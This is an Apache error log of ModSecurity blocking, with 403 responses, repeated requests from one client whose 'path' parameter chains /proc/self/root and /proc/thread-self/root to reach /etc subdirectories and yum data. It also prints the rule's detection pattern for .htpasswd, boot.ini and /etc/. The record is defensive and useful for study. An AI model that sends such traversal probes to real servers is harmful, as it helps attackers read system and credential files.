[Wed Mar 18 08:25:30.673206 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.243.128:54258] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLqsdf6f5d65gmYZS7lwAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:25:31.991363 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.243.128:54264] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLq9Y0UrI5A3LftIyHigAAAZc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:25:33.290876 2026] [:error] [pid 17653:tid 140411716749056] [client 74.7.243.128:54278] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLrcdf6f5d65gmYZS7mgAAAsM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:25:34.621613 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.243.128:54288] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLruyqAr6etmhZHNqlNAAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:25:35.918360 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:54294] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLr-yqAr6etmhZHNqlNgAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:25:37.215012 2026] [:error] [pid 11816:tid 140411607643904] [client 74.7.243.128:54298] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLsew_le52K8_3pV3IAAAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:25:38.723960 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.243.128:54308] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLsgkwaGbbGflqUZD4RwAAANM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:25:40.001121 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.243.128:54118] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLs-oXxyEfFpUF8f9WWgAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:25:41.811833 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.243.128:54134] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLteyqAr6etmhZHNqlPgAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:25:44.671415 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.243.128:54146] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLuMdf6f5d65gmYZS7nwAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:25:45.986064 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.243.128:54158] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLudY0UrI5A3LftIyHlQAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:25:47.277086 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.243.128:54162] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLu-yqAr6etmhZHNqlQgAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:25:48.603537 2026] [:error] [pid 17887:tid 140411733534464] [client 74.7.243.128:54164] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLvAkwaGbbGflqUZD4UQAAAME"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:25:49.864368 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.243.128:33952] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLvcdf6f5d65gmYZS7pgAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:25:51.227013 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.243.128:33968] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLv-oXxyEfFpUF8f9WZQAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:25:52.515097 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.243.128:33970] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLwNY0UrI5A3LftIyHnwAAAYc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:25:53.854935 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.243.128:33982] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLweoXxyEfFpUF8f9WZgAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:25:55.250220 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.243.128:33984] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLw-yqAr6etmhZHNqlUgAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:25:56.556930 2026] [mime_magic:error] [pid 30077:tid 140411674785536] (70014)End of file found: [client 74.7.241.31:46016] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/lib/yum/yumdb
[Wed Mar 18 08:25:56.646997 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.243.128:33986] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLxOyqAr6etmhZHNqlVQAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:25:57.983029 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.243.128:33988] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLxcdf6f5d65gmYZS7rgAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:25:59.326985 2026] [:error] [pid 29882:tid 140411599251200] [client 74.7.243.128:33996] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLx0zinOy1jxa1j4f6qwAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:26:00.669963 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.243.128:59584] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLyNY0UrI5A3LftIyHpQAAAZY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
